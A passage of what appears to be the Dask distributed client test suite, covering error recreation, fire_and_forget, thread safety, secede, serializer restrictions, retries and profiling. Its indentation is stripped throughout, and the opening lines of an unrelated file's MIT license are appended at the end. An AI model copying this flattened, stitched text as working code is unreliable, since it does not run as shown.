y0 = delayed(dec)(1, dask_key_name="y0")
x = delayed(div)(1, x0, dask_key_name="x")
y = delayed(div)(1, y0, dask_key_name="y")
tot = delayed(sum)(x, y, dask_key_name="tot")
f = c.compute(tot)
yield wait(f)
assert f.status == "error"
function, args, kwargs, deps = yield c._get_futures_error(f)
assert function.__name__ == "div"
assert args == (1, y0.key)
@gen_cluster(client=True)
def test_recreate_error_delayed(c, s, a, b):
x0 = delayed(dec)(2)
y0 = delayed(dec)(1)
x = delayed(div)(1, x0)
y = delayed(div)(1, y0)
tot = delayed(sum)(x, y)
f = c.compute(tot)
assert f.status == "pending"
function, args, kwargs = yield c._recreate_error_locally(f)
assert f.status == "error"
assert function.__name__ == "div"
assert args == (1, 0)
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
@gen_cluster(client=True)
def test_recreate_error_futures(c, s, a, b):
x0 = c.submit(dec, 2)
y0 = c.submit(dec, 1)
x = c.submit(div, 1, x0)
y = c.submit(div, 1, y0)
tot = c.submit(sum, x, y)
f = c.compute(tot)
assert f.status == "pending"
function, args, kwargs = yield c._recreate_error_locally(f)
assert f.status == "error"
assert function.__name__ == "div"
assert args == (1, 0)
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
@gen_cluster(client=True)
def test_recreate_error_collection(c, s, a, b):
b = db.range(10, npartitions=4)
b = b.map(lambda x: 1 / x)
b = b.persist()
f = c.compute(b)
function, args, kwargs = yield c._recreate_error_locally(f)
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
df = dd.from_pandas(pd.DataFrame({"a": [0, 1, 2, 3, 4]}), chunksize=2)
def make_err(x):
# because pandas would happily work with NaN
if x == 0:
raise ValueError
return x
df2 = df.a.map(make_err)
f = c.compute(df2)
function, args, kwargs = yield c._recreate_error_locally(f)
with pytest.raises(ValueError):
function(*args, **kwargs)
# with persist
df3 = c.persist(df2)
function, args, kwargs = yield c._recreate_error_locally(df3)
with pytest.raises(ValueError):
function(*args, **kwargs)
@gen_cluster(client=True)
def test_recreate_error_array(c, s, a, b):
da = pytest.importorskip("dask.array")
pytest.importorskip("scipy")
z = (da.linalg.inv(da.zeros((10, 10), chunks=10)) + 1).sum()
zz = z.persist()
func, args, kwargs = yield c._recreate_error_locally(zz)
assert "0.,0.,0." in str(args).replace(" ", "") # args contain actual arrays
def test_recreate_error_sync(c):
x0 = c.submit(dec, 2)
y0 = c.submit(dec, 1)
x = c.submit(div, 1, x0)
y = c.submit(div, 1, y0)
tot = c.submit(sum, x, y)
f = c.compute(tot)
with pytest.raises(ZeroDivisionError):
c.recreate_error_locally(f)
assert f.status == "error"
def test_recreate_error_not_error(c):
f = c.submit(dec, 2)
with pytest.raises(ValueError, match="No errored futures passed"):
c.recreate_error_locally(f)
@gen_cluster(client=True)
def test_retire_workers(c, s, a, b):
assert set(s.workers) == {a.address, b.address}
yield c.retire_workers(workers=[a.address], close_workers=True)
assert set(s.workers) == {b.address}
start = time()
while a.status != "closed":
yield gen.sleep(0.01)
assert time() < start + 5
class MyException(Exception):
pass
@gen_cluster(client=True)
def test_robust_unserializable(c, s, a, b):
class Foo(object):
def __getstate__(self):
raise MyException()
with pytest.raises(MyException):
future = c.submit(identity, Foo())
futures = c.map(inc, range(10))
results = yield c.gather(futures)
assert results == list(map(inc, range(10)))
assert a.data and b.data
@gen_cluster(client=True)
def test_robust_undeserializable(c, s, a, b):
class Foo(object):
def __getstate__(self):
return 1
def __setstate__(self, state):
raise MyException("hello")
future = c.submit(identity, Foo())
with pytest.raises(MyException):
yield future
futures = c.map(inc, range(10))
results = yield c.gather(futures)
assert results == list(map(inc, range(10)))
assert a.data and b.data
@gen_cluster(client=True)
def test_robust_undeserializable_function(c, s, a, b):
class Foo(object):
def __getstate__(self):
return 1
def __setstate__(self, state):
raise MyException("hello")
def __call__(self, *args):
return 1
future = c.submit(Foo(), 1)
with pytest.raises(MyException):
yield future
futures = c.map(inc, range(10))
results = yield c.gather(futures)
assert results == list(map(inc, range(10)))
assert a.data and b.data
@gen_cluster(client=True)
def test_fire_and_forget(c, s, a, b):
future = c.submit(slowinc, 1, delay=0.1)
import distributed
def f(x):
distributed.foo = 123
try:
fire_and_forget(c.submit(f, future))
start = time()
while not hasattr(distributed, "foo"):
yield gen.sleep(0.01)
assert time() < start + 2
assert distributed.foo == 123
finally:
del distributed.foo
start = time()
while len(s.tasks) > 1:
yield gen.sleep(0.01)
assert time() < start + 2
assert set(s.who_wants) == {future.key}
assert set(s.tasks) == {future.key}
@gen_cluster(client=True)
def test_fire_and_forget_err(c, s, a, b):
fire_and_forget(c.submit(div, 1, 0))
yield gen.sleep(0.1)
# erred task should clear out quickly
start = time()
while s.tasks:
yield gen.sleep(0.01)
assert time() < start + 1
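# Closing clients and clusters should be quiet: apart from benign lines
# such as reconnect notices, nothing should land in the logs.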
def test_quiet_client_close(loop):
with captured_logger(logging.getLogger("distributed")) as logger:
with Client(loop=loop, processes=False, threads_per_worker=4) as c:
futures = c.map(slowinc, range(1000), delay=0.01)
sleep(0.200) # stop part-way
sleep(0.1) # let things settle
out = logger.getvalue()
lines = out.strip().split("\n")
assert len(lines) <= 2
for line in lines:
assert (
not line
or "Reconnecting" in line
or "garbage" in line
or set(line) == {"-"}
), line
@pytest.mark.slow
def test_quiet_client_close_when_cluster_is_closed_before_client(loop):
with captured_logger(logging.getLogger("tornado.application")) as logger:
cluster = LocalCluster(loop=loop, n_workers=1, dashboard_address=":0")
client = Client(cluster, loop=loop)
cluster.close()
client.close()
out = logger.getvalue()
assert "CancelledError" not in out
@gen_cluster()
def test_close(s, a, b):
c = yield Client(s.address, asynchronous=True)
future = c.submit(inc, 1)
yield wait(future)
assert c.id in s.wants_what
yield c.close()
start = time()
while c.id in s.wants_what or s.tasks:
yield gen.sleep(0.01)
assert time() < start + 5
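# The test_threadsafe* tests hammer one synchronous client from many threads
# at once (submit/gather, collection .compute(), and Client.compute) to make
# sure its internal state holds up under concurrent use.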
def test_threadsafe(c):
def f(_):
d = deque(maxlen=50)
for i in range(100):
future = c.submit(inc, random.randint(0, 100))
d.append(future)
sleep(0.001)
c.gather(list(d))
total = c.submit(sum, list(d))
return total.result()
from concurrent.futures import ThreadPoolExecutor
with ThreadPoolExecutor(20) as e:
results = list(e.map(f, range(20)))
assert results and all(results)
del results
@pytest.mark.slow
def test_threadsafe_get(c):
da = pytest.importorskip("dask.array")
x = da.arange(100, chunks=(10,))
def f(_):
total = 0
for i in range(20):
total += (x + random.randint(0, 20)).sum().compute()
sleep(0.001)
return total
from concurrent.futures import ThreadPoolExecutor
with ThreadPoolExecutor(30) as e:
results = list(e.map(f, range(30)))
assert results and all(results)
@pytest.mark.slow
def test_threadsafe_compute(c):
da = pytest.importorskip("dask.array")
x = da.arange(100, chunks=(10,))
def f(_):
total = 0
for i in range(20):
future = c.compute((x + random.randint(0, 20)).sum())
total += future.result()
sleep(0.001)
return total
from concurrent.futures import ThreadPoolExecutor
e = ThreadPoolExecutor(30)
results = list(e.map(f, range(30)))
assert results and all(results)
@gen_cluster(client=True)
def test_identity(c, s, a, b):
assert c.id.lower().startswith("client")
assert a.id.lower().startswith("worker")
assert b.id.lower().startswith("worker")
assert s.id.lower().startswith("scheduler")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 4)] * 2)
def test_get_client(c, s, a, b):
assert get_client() is c
assert c.asynchronous
def f(x):
client = get_client()
future = client.submit(inc, x)
import distributed
assert not client.asynchronous
assert client is distributed.tmp_client
return future.result()
import distributed
distributed.tmp_client = c
try:
futures = c.map(f, range(5))
results = yield c.gather(futures)
assert results == list(map(inc, range(5)))
finally:
del distributed.tmp_client
def test_get_client_no_cluster():
# Clean up any global workers added by other tests. This test requires that
# there are no global workers.
Worker._instances.clear()
msg = "No global client found and no address provided"
with pytest.raises(ValueError, match=r"^{}$".format(msg)):
get_client()
@gen_cluster(client=True)
def test_serialize_collections(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.arange(10, chunks=(5,)).persist()
def f(x):
assert isinstance(x, da.Array)
return x.sum().compute()
future = c.submit(f, x)
result = yield future
assert result == sum(range(10))
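# secede() hands a task's thread back to the worker while it blocks on
# sub-tasks submitted via get_client(); the tests below check the simple
# round trip and that thread counts stay bounded under heavy nesting.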
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 1, timeout=100)
def test_secede_simple(c, s, a):
def f():
client = get_client()
secede()
return client.submit(inc, 1).result()
result = yield c.submit(f)
assert result == 2
@pytest.mark.slow
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 2, timeout=60)
def test_secede_balances(c, s, a, b):
count = threading.active_count()
def f(x):
client = get_client()
sleep(0.01) # do some work
secede()
futures = client.map(slowinc, range(10), pure=False, delay=0.01)
total = client.submit(sum, futures).result()
return total
futures = c.map(f, range(100))
start = time()
while not all(f.status == "finished" for f in futures):
yield gen.sleep(0.01)
assert threading.active_count() < count + 50
# assert 0.005 < s.task_duration['f'] < 0.1
assert len(a.log) < 2 * len(b.log)
assert len(b.log) < 2 * len(a.log)
results = yield c.gather(futures)
assert results == [sum(map(inc, range(10)))] * 100
@gen_cluster(client=True)
def test_sub_submit_priority(c, s, a, b):
def f():
client = get_client()
client.submit(slowinc, 1, delay=0.2, key="slowinc")
future = c.submit(f, key="f")
yield gen.sleep(0.1)
if len(s.tasks) == 2:
assert (
s.priorities["f"] > s.priorities["slowinc"]
) # lower values schedule first
def test_get_client_sync(c, s, a, b):
results = c.run(lambda: get_worker().scheduler.address)
assert results == {w["address"]: s["address"] for w in [a, b]}
results = c.run(lambda: get_client().scheduler.address)
assert results == {w["address"]: s["address"] for w in [a, b]}
@gen_cluster(client=True)
def test_serialize_collections_of_futures(c, s, a, b):
pd = pytest.importorskip("pandas")
dd = pytest.importorskip("dask.dataframe")
from dask.dataframe.utils import assert_eq
df = pd.DataFrame({"x": [1, 2, 3]})
ddf = dd.from_pandas(df, npartitions=2).persist()
future = yield c.scatter(ddf)
ddf2 = yield future
df2 = yield c.compute(ddf2)
assert_eq(df, df2)
def test_serialize_collections_of_futures_sync(c):
pd = pytest.importorskip("pandas")
dd = pytest.importorskip("dask.dataframe")
from dask.dataframe.utils import assert_eq
df = pd.DataFrame({"x": [1, 2, 3]})
ddf = dd.from_pandas(df, npartitions=2).persist()
future = c.scatter(ddf)
result = future.result()
assert_eq(result.compute(), df)
assert future.type == dd.DataFrame
assert c.submit(lambda x, y: assert_eq(x.compute(), y), future, df).result()
def _dynamic_workload(x, delay=0.01):
if delay == "random":
sleep(random.random() / 2)
else:
sleep(delay)
if x > 4:
return 4
secede()
client = get_client()
futures = client.map(
_dynamic_workload, [x + i + 1 for i in range(2)], pure=False, delay=delay
)
total = client.submit(sum, futures)
return total.result()
def _test_dynamic_workloads_sync(c, delay):
future = c.submit(_dynamic_workload, 0, delay=delay)
assert future.result(timeout=40) == 52
def test_dynamic_workloads_sync(c):
_test_dynamic_workloads_sync(c, delay=0.02)
@pytest.mark.slow
def test_dynamic_workloads_sync_random(c):
_test_dynamic_workloads_sync(c, delay="random")
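# Task keys may be bytes, ASCII unicode, or non-ASCII unicode; the next
# three tests assert that the key type survives the round trip through the
# scheduler and workers.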
@gen_cluster(client=True)
def test_bytes_keys(c, s, a, b):
key = b"inc-123"
future = c.submit(inc, 1, key=key)
result = yield future
assert type(future.key) is bytes
assert set(s.tasks) == {key}
assert key in a.data or key in b.data
assert result == 2
@gen_cluster(client=True)
def test_unicode_ascii_keys(c, s, a, b):
uni_type = type(u"")
key = u"inc-123"
future = c.submit(inc, 1, key=key)
result = yield future
assert type(future.key) is uni_type
assert set(s.tasks) == {key}
assert key in a.data or key in b.data
assert result == 2
@gen_cluster(client=True)
def test_unicode_keys(c, s, a, b):
uni_type = type(u"")
key = u"inc-123\u03bc"
future = c.submit(inc, 1, key=key)
result = yield future
assert type(future.key) is uni_type
assert set(s.tasks) == {key}
assert key in a.data or key in b.data
assert result == 2
future2 = c.submit(inc, future)
result2 = yield future2
assert result2 == 3
future3 = yield c.scatter({u"data-123": 123})
result3 = yield future3[u"data-123"]
assert result3 == 123
def test_use_synchronous_client_in_async_context(loop, c):
@gen.coroutine
def f():
x = yield c.scatter(123)
y = c.submit(inc, x)
z = yield c.gather(y)
raise gen.Return(z)
z = sync(loop, f)
assert z == 124
def test_quiet_quit_when_cluster_leaves(loop_in_thread):
loop = loop_in_thread
with LocalCluster(
loop=loop, scheduler_port=0, dashboard_address=None, silence_logs=False
) as cluster:
with captured_logger("distributed.comm") as sio:
with Client(cluster, loop=loop) as client:
futures = client.map(lambda x: x + 1, range(10))
sleep(0.05)
cluster.close()
sleep(0.05)
text = sio.getvalue()
assert not text
def test_warn_executor(loop, s, a, b):
with warnings.catch_warnings(record=True) as record:
with Executor(s["address"], loop=loop) as c:
pass
assert any("Client" in str(r.message) for r in record)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
def test_call_stack_future(c, s, a, b):
x = c.submit(slowdec, 1, delay=0.5)
future = c.submit(slowinc, 1, delay=0.5)
yield gen.sleep(0.1)
results = yield [c.call_stack(future), c.call_stack(keys=[future.key])]
assert all(list(first(result.values())) == [future.key] for result in results)
assert results[0] == results[1]
result = results[0]
w = a if future.key in a.executing else b
assert list(result) == [w.address]
assert list(result[w.address]) == [future.key]
assert "slowinc" in str(result)
assert "slowdec" not in str(result)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
def test_call_stack_all(c, s, a, b):
future = c.submit(slowinc, 1, delay=0.8)
while not a.executing and not b.executing:
yield gen.sleep(0.01)
result = yield c.call_stack()
w = a if a.executing else b
assert list(result) == [w.address]
assert list(result[w.address]) == [future.key]
assert "slowinc" in str(result)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
def test_call_stack_collections(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.random.random(100, chunks=(10,)).map_blocks(slowinc, delay=0.5).persist()
while not a.executing and not b.executing:
yield gen.sleep(0.001)
result = yield c.call_stack(x)
assert result
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
def test_call_stack_collections_all(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.random.random(100, chunks=(10,)).map_blocks(slowinc, delay=0.5).persist()
while not a.executing and not b.executing:
yield gen.sleep(0.001)
result = yield c.call_stack()
assert result
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": 100})
def test_profile(c, s, a, b):
futures = c.map(slowinc, range(10), delay=0.05, workers=a.address)
yield wait(futures)
x = yield c.profile(start=time() + 10, stop=time() + 20)
assert not x["count"]
x = yield c.profile(start=0, stop=time())
assert (
x["count"]
== sum(p["count"] for _, p in a.profile_history) + a.profile_recent["count"]
)
y = yield c.profile(start=time() - 0.300, stop=time())
assert 0 < y["count"] < x["count"]
assert not any(p["count"] for _, p in b.profile_history)
result = yield c.profile(workers=b.address)
assert not result["count"]
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": 100})
def test_profile_keys(c, s, a, b):
x = c.map(slowinc, range(10), delay=0.05, workers=a.address)
y = c.map(slowdec, range(10), delay=0.05, workers=a.address)
yield wait(x + y)
xp = yield c.profile("slowinc")
yp = yield c.profile("slowdec")
p = yield c.profile()
assert p["count"] == xp["count"] + yp["count"]
with captured_logger(logging.getLogger("distributed")) as logger:
prof = yield c.profile("does-not-exist")
assert prof == profile.create()
out = logger.getvalue()
assert not out
@gen_cluster()
def test_client_with_name(s, a, b):
with captured_logger("distributed.scheduler") as sio:
client = yield Client(
s.address, asynchronous=True, name="foo", silence_logs=False
)
assert "foo" in client.id
yield client.close()
text = sio.getvalue()
assert "foo" in text
@gen_cluster(client=True)
def test_future_defaults_to_default_client(c, s, a, b):
x = c.submit(inc, 1)
yield wait(x)
future = Future(x.key)
assert future.client is c
@gen_cluster(client=True)
def test_future_auto_inform(c, s, a, b):
x = c.submit(inc, 1)
yield wait(x)
client = yield Client(s.address, asynchronous=True)
future = Future(x.key, client)
start = time()
while future.status != "finished":
yield gen.sleep(0.01)
assert time() < start + 1
yield client.close()
def test_client_async_before_loop_starts():
with pristine_loop() as loop:
client = Client(asynchronous=True, loop=loop)
assert client.asynchronous
client.close()
@pytest.mark.slow
@gen_cluster(client=True, Worker=Nanny, timeout=60, nthreads=[("127.0.0.1", 3)] * 2)
def test_nested_compute(c, s, a, b):
def fib(x):
assert get_worker().get_current_task()
if x < 2:
return x
a = delayed(fib)(x - 1)
b = delayed(fib)(x - 2)
c = a + b
return c.compute()
future = c.submit(fib, 8)
result = yield future
assert result == 21
assert len(s.transition_log) > 50
@gen_cluster(client=True)
def test_task_metadata(c, s, a, b):
yield c.set_metadata("x", 1)
result = yield c.get_metadata("x")
assert result == 1
future = c.submit(inc, 1)
key = future.key
yield wait(future)
yield c.set_metadata(key, 123)
result = yield c.get_metadata(key)
assert result == 123
del future
while key in s.tasks:
yield gen.sleep(0.01)
with pytest.raises(KeyError):
yield c.get_metadata(key)
result = yield c.get_metadata(key, None)
assert result is None
yield c.set_metadata(["x", "a"], 1)
result = yield c.get_metadata("x")
assert result == {"a": 1}
yield c.set_metadata(["x", "b"], 2)
result = yield c.get_metadata("x")
assert result == {"a": 1, "b": 2}
result = yield c.get_metadata(["x", "a"])
assert result == 1
yield c.set_metadata(["x", "a", "c", "d"], 1)
result = yield c.get_metadata("x")
assert result == {"a": {"c": {"d": 1}}, "b": 2}
@gen_cluster(client=True, Worker=Nanny)
def test_logs(c, s, a, b):
yield wait(c.map(inc, range(5)))
logs = yield c.get_scheduler_logs(n=5)
assert logs
for _, msg in logs:
assert "distributed.scheduler" in msg
w_logs = yield c.get_worker_logs(n=5)
assert set(w_logs.keys()) == {a.worker_address, b.worker_address}
for log in w_logs.values():
for _, msg in log:
assert "distributed.worker" in msg
n_logs = yield c.get_worker_logs(nanny=True)
assert set(n_logs.keys()) == {a.worker_address, b.worker_address}
for log in n_logs.values():
for _, msg in log:
assert "distributed.nanny" in msg
n_logs = yield c.get_worker_logs(nanny=True, workers=[a.worker_address])
assert set(n_logs.keys()) == {a.worker_address}
for log in n_logs.values():
for _, msg in log:
assert "distributed.nanny" in msg
@gen_cluster(client=True)
def test_avoid_delayed_finalize(c, s, a, b):
x = delayed(inc)(1)
future = c.compute(x)
result = yield future
assert result == 2
assert list(s.tasks) == [future.key] == [x.key]
@gen_cluster()
def test_config_scheduler_address(s, a, b):
with dask.config.set({"scheduler-address": s.address}):
with captured_logger("distributed.client") as sio:
c = yield Client(asynchronous=True)
assert c.scheduler.address == s.address
text = sio.getvalue()
assert s.address in text
yield c.close()
@gen_cluster(client=True)
def test_warn_when_submitting_large_values(c, s, a, b):
with warnings.catch_warnings(record=True) as record:
future = c.submit(lambda x: x + 1, b"0" * 2000000)
text = str(record[0].message)
assert "2.00 MB" in text
assert "large" in text
assert "..." in text
assert "'000" in text
assert "000'" in text
assert len(text) < 2000
with warnings.catch_warnings(record=True) as record:
data = b"0" * 2000000
for i in range(10):
future = c.submit(lambda x, y: x, data, i)
assert len(record) < 2
@gen_cluster()
def test_scatter_direct(s, a, b):
c = yield Client(s.address, asynchronous=True, heartbeat_interval=10)
last = s.clients[c.id].last_seen
start = time()
while s.clients[c.id].last_seen == last:
yield gen.sleep(0.10)
assert time() < start + 5
yield c.close()
@pytest.mark.skipif(sys.version_info[0] < 3, reason="cloudpickle Py27 issue")
@gen_cluster(client=True)
def test_unhashable_function(c, s, a, b):
d = {"a": 1}
result = yield c.submit(d.get, "a")
assert result == 1
@gen_cluster()
def test_client_name(s, a, b):
with dask.config.set({"client-name": "hello-world"}):
c = yield Client(s.address, asynchronous=True)
assert any("hello-world" in name for name in list(s.clients))
yield c.close()
def test_client_doesnt_close_given_loop(loop, s, a, b):
with Client(s["address"], loop=loop) as c:
assert c.submit(inc, 1).result() == 2
with Client(s["address"], loop=loop) as c:
assert c.submit(inc, 2).result() == 3
@gen_cluster(client=True, nthreads=[])
def test_quiet_scheduler_loss(c, s):
c._periodic_callbacks["scheduler-info"].interval = 10
with captured_logger(logging.getLogger("distributed.client")) as logger:
yield s.close()
yield c._update_scheduler_info()
text = logger.getvalue()
assert "BrokenPipeError" not in text
def test_dashboard_link(loop, monkeypatch):
pytest.importorskip("bokeh")
from distributed.dashboard import BokehScheduler
monkeypatch.setenv("USER", "myusername")
with cluster(
scheduler_kwargs={"services": {("dashboard", 12355): BokehScheduler}}
) as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
with dask.config.set(
{"distributed.dashboard.link": "{scheme}://foo-{USER}:{port}/status"}
):
text = c._repr_html_()
link = "http://foo-myusername:12355/status"
assert link in text
@gen_test()
def test_client_timeout_2():
with dask.config.set({"distributed.comm.timeouts.connect": "10ms"}):
start = time()
c = Client("127.0.0.1:3755", asynchronous=True)
with pytest.raises((TimeoutError, IOError)):
yield c
stop = time()
assert c.status == "closed"
yield c.close()
assert stop - start < 1
@gen_test()
def test_client_active_bad_port():
import tornado.web
import tornado.httpserver
application = tornado.web.Application([(r"/", tornado.web.RequestHandler)])
http_server = tornado.httpserver.HTTPServer(application)
http_server.listen(8080)
with dask.config.set({"distributed.comm.timeouts.connect": "10ms"}):
c = Client("127.0.0.1:8080", asynchronous=True)
with pytest.raises((TimeoutError, IOError)):
yield c
yield c._close(fast=True)
http_server.stop()
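# With serializers restricted to dask/msgpack, arbitrary objects can still
# travel inside task definitions (a separate, pickled channel) but not as
# scattered data or gathered results.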
@pytest.mark.parametrize("direct", [True, False])
def test_turn_off_pickle(direct):
@gen_cluster()
def test(s, a, b):
import numpy as np
c = yield Client(s.address, asynchronous=True, serializers=["dask", "msgpack"])
try:
assert (yield c.submit(inc, 1)) == 2
yield c.submit(np.ones, 5)
yield c.scatter(1)
# Can't send complex data
with pytest.raises(TypeError):
future = yield c.scatter(inc)
# can send complex tasks (this uses pickle regardless)
future = c.submit(lambda x: x, inc)
yield wait(future)
# but can't receive complex results
with pytest.raises(TypeError):
yield c.gather(future, direct=direct)
# Run works
result = yield c.run(lambda: 1)
assert list(result.values()) == [1, 1]
result = yield c.run_on_scheduler(lambda: 1)
assert result == 1
# But not with complex return values
with pytest.raises(TypeError):
yield c.run(lambda: inc)
with pytest.raises(TypeError):
yield c.run_on_scheduler(lambda: inc)
finally:
yield c.close()
test()
@gen_cluster()
def test_de_serialization(s, a, b):
import numpy as np
c = yield Client(
s.address,
asynchronous=True,
serializers=["msgpack", "pickle"],
deserializers=["msgpack"],
)
try:
# Can send complex data
future = yield c.scatter(np.ones(5))
# But can not retrieve it
with pytest.raises(TypeError):
result = yield future
finally:
yield c.close()
@gen_cluster()
def test_de_serialization_none(s, a, b):
import numpy as np
c = yield Client(s.address, asynchronous=True, deserializers=["msgpack"])
try:
# Can send complex data
future = yield c.scatter(np.ones(5))
# But can not retrieve it
with pytest.raises(TypeError):
result = yield future
finally:
yield c.close()
@gen_cluster()
def test_client_repr_closed(s, a, b):
c = yield Client(s.address, asynchronous=True, dashboard_address=None)
yield c.close()
c._repr_html_()
def test_client_repr_closed_sync(loop):
with Client(loop=loop, processes=False, dashboard_address=None) as c:
c.close()
c._repr_html_()
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)])
def test_nested_prioritization(c, s, w):
x = delayed(inc)(1, dask_key_name=("a", 2))
y = delayed(inc)(2, dask_key_name=("a", 10))
o = dask.order.order(merge(x.__dask_graph__(), y.__dask_graph__()))
fx, fy = c.compute([x, y])
yield wait([fx, fy])
assert (o[x.key] < o[y.key]) == (
s.tasks[tokey(fx.key)].priority < s.tasks[tokey(fy.key)].priority
)
@gen_cluster(client=True)
def test_scatter_error_cancel(c, s, a, b):
# https://github.com/dask/distributed/issues/2038
def bad_fn(x):
raise Exception("lol")
x = yield c.scatter(1)
y = c.submit(bad_fn, x)
del x
yield wait(y)
assert y.status == "error"
yield gen.sleep(0.1)
assert y.status == "error" # not cancelled
def test_no_threads_lingering():
active = dict(threading._active)
assert threading.active_count() < 40, list(active.values())
@gen_cluster()
def test_direct_async(s, a, b):
c = yield Client(s.address, asynchronous=True, direct_to_workers=True)
assert c.direct_to_workers
yield c.close()
c = yield Client(s.address, asynchronous=True, direct_to_workers=False)
assert not c.direct_to_workers
yield c.close()
def test_direct_sync(c):
assert not c.direct_to_workers
def f():
return get_client().direct_to_workers
assert c.submit(f).result()
@gen_cluster()
def test_mixing_clients(s, a, b):
c1 = yield Client(s.address, asynchronous=True)
c2 = yield Client(s.address, asynchronous=True)
future = c1.submit(inc, 1)
with pytest.raises(ValueError):
c2.submit(inc, future)
yield c1.close()
yield c2.close()
@gen_cluster(client=True)
def test_tuple_keys(c, s, a, b):
x = dask.delayed(inc)(1, dask_key_name=("x", 1))
y = dask.delayed(inc)(x, dask_key_name=("y", 1))
future = c.compute(y)
assert (yield future) == 3
@gen_cluster(client=True)
def test_map_large_kwargs_in_graph(c, s, a, b):
np = pytest.importorskip("numpy")
x = np.random.random(100000)
futures = c.map(lambda a, b: a + b, range(100), b=x)
while not s.tasks:
yield gen.sleep(0.01)
assert len(s.tasks) == 101
assert any(k.startswith("ndarray") for k in s.tasks)
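# Future.retry() reruns a failed task in place; retrying a dependent also
# reruns its failed or released inputs, as the next tests demonstrate.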
@gen_cluster(client=True)
def test_retry(c, s, a, b):
def f():
assert dask.config.get("foo")
with dask.config.set(foo=False):
future = c.submit(f)
with pytest.raises(AssertionError):
yield future
with dask.config.set(foo=True):
yield future.retry()
yield future
@gen_cluster(client=True)
def test_retry_dependencies(c, s, a, b):
def f():
return dask.config.get("foo")
x = c.submit(f)
y = c.submit(inc, x)
with pytest.raises(KeyError):
yield y
with dask.config.set(foo=100):
yield y.retry()
result = yield y
assert result == 101
yield y.retry()
yield x.retry()
result = yield y
assert result == 101
@gen_cluster(client=True)
def test_released_dependencies(c, s, a, b):
def f(x):
return dask.config.get("foo") + 1
x = c.submit(inc, 1, key="x")
y = c.submit(f, x, key="y")
del x
with pytest.raises(KeyError):
yield y
with dask.config.set(foo=100):
yield y.retry()
result = yield y
assert result == 101
@gen_cluster(client=True, clean_kwargs={"threads": False})
def test_profile_bokeh(c, s, a, b):
pytest.importorskip("bokeh.plotting")
from bokeh.model import Model
yield c.map(slowinc, range(10), delay=0.2)
state, figure = yield c.profile(plot=True)
assert isinstance(figure, Model)
with tmpfile("html") as fn:
try:
yield c.profile(filename=fn)
except PermissionError:
if WINDOWS:
pytest.xfail()
assert os.path.exists(fn)
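# SubgraphCallable packs several tasks into a single callable; mixing
# Futures into such subgraphs (including nested ones) must still resolve.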
@gen_cluster(client=True)
def test_get_mix_futures_and_SubgraphCallable(c, s, a, b):
future = c.submit(add, 1, 2)
subgraph = SubgraphCallable(
{"_2": (add, "_0", "_1"), "_3": (add, future, "_2")}, "_3", ("_0", "_1")
)
dsk = {"a": 1, "b": 2, "c": (subgraph, "a", "b"), "d": (subgraph, "c", "b")}
future2 = c.get(dsk, "d", sync=False)
result = yield future2
assert result == 11
# Nested subgraphs
subgraph2 = SubgraphCallable(
{
"_2": (subgraph, "_0", "_1"),
"_3": (subgraph, "_2", "_1"),
"_4": (add, "_3", future2),
},
"_4",
("_0", "_1"),
)
dsk2 = {"e": 1, "f": 2, "g": (subgraph2, "e", "f")}
result = yield c.get(dsk2, "g", sync=False)
assert result == 22
@gen_cluster(client=True)
def test_get_mix_futures_and_SubgraphCallable_dask_dataframe(c, s, a, b):
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
df = pd.DataFrame({"x": range(1, 11)})
ddf = dd.from_pandas(df, npartitions=2).persist()
ddf = ddf.map_partitions(lambda x: x)
ddf["x"] = ddf["x"].astype("f8")
ddf = ddf.map_partitions(lambda x: x)
ddf["x"] = ddf["x"].astype("f8")
result = yield c.compute(ddf)
assert result.equals(df.astype("f8"))
def test_direct_to_workers(s, loop):
with Client(s["address"], loop=loop, direct_to_workers=True) as client:
future = client.scatter(1)
future.result()
resp = client.run_on_scheduler(lambda dask_scheduler: dask_scheduler.events)
assert "gather" not in str(resp)
@gen_cluster(client=True)
def test_instances(c, s, a, b):
assert list(Client._instances) == [c]
assert list(Scheduler._instances) == [s]
assert set(Worker._instances) == {a, b}
@gen_cluster(client=True)
def test_wait_for_workers(c, s, a, b):
future = asyncio.ensure_future(c.wait_for_workers(n_workers=3))
yield gen.sleep(0.22) # 2 chances
assert not future.done()
w = yield Worker(s.address)
start = time()
yield future
assert time() < start + 1
yield w.close()
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
@pytest.mark.asyncio
@pytest.mark.parametrize("Worker", [Worker, Nanny])
async def test_file_descriptors_dont_leak(Worker):
pytest.importorskip("pandas")
df = dask.datasets.timeseries(freq="10s", dtypes={"x": int, "y": float})
proc = psutil.Process()
start = proc.num_fds()
async with Scheduler(port=0, dashboard_address=":0") as s:
async with Worker(s.address, nthreads=2) as a, Worker(
s.address, nthreads=2
) as b:
async with Client(s.address, asynchronous=True) as c:
await df.sum().persist()
begin = time()
while proc.num_fds() > begin:
await asyncio.sleep(0.01)
assert time() < begin + 5, (start, proc.num_fds())
if sys.version_info >= (3, 5):
from distributed.tests.py3_test_client import * # noqa F401
|
index.py
|
# -*- coding: utf-8 -*-
"""
MIT License
Copyright (c) 2020 gomashio1596
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
